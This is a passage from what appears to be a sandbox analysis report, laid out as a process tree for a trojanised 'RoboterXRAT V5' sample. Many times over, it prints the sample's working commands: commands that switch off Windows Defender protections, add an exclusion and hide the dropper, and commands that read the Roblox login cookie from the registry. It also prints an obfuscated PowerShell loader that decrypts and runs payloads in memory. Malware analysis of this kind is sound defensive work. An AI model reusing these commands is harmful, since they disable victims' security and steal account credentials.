        Command and Scripting Interpreter: PowerShell
        
        PID:1548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:3000
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2068
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:2672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:1096
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        Views/modifies file attributes
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        43⤵
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        43⤵
        
        PID:2632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        43⤵
        
        PID:2876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        43⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        43⤵
        
        PID:2568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        43⤵
        Detects videocard installed
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        43⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:988
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:2332
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        39⤵
        
        PID:2744
        
        C:\Windows\system32\net.exe
        
        net file
        40⤵
        
        PID:2900
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        41⤵
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        38⤵
        
        PID:2964
        
        C:\Windows\system32\net.exe
        
        net file
        39⤵
        
        PID:2444
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        40⤵
        
        PID:2720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:1860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        37⤵
        
        PID:2776
        
        C:\Windows\system32\net.exe
        
        net file
        38⤵
        
        PID:1552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        39⤵
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:1260
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        36⤵
        
        PID:2876
        
        C:\Windows\system32\net.exe
        
        net file
        37⤵
        
        PID:2280
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        38⤵
        
        PID:2284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        37⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:1632
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        35⤵
        
        PID:2012
        
        C:\Windows\system32\net.exe
        
        net file
        36⤵
        
        PID:2032
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        37⤵
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        36⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:1956
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        34⤵
        
        PID:2668
        
        C:\Windows\system32\net.exe
        
        net file
        35⤵
        
        PID:2844
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        36⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        35⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:1796
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:2308
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        Views/modifies file attributes
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        39⤵
        
        PID:1196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:2508
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:1268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:2476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:572
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:764
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        33⤵
        
        PID:3064
        
        C:\Windows\system32\net.exe
        
        net file
        34⤵
        
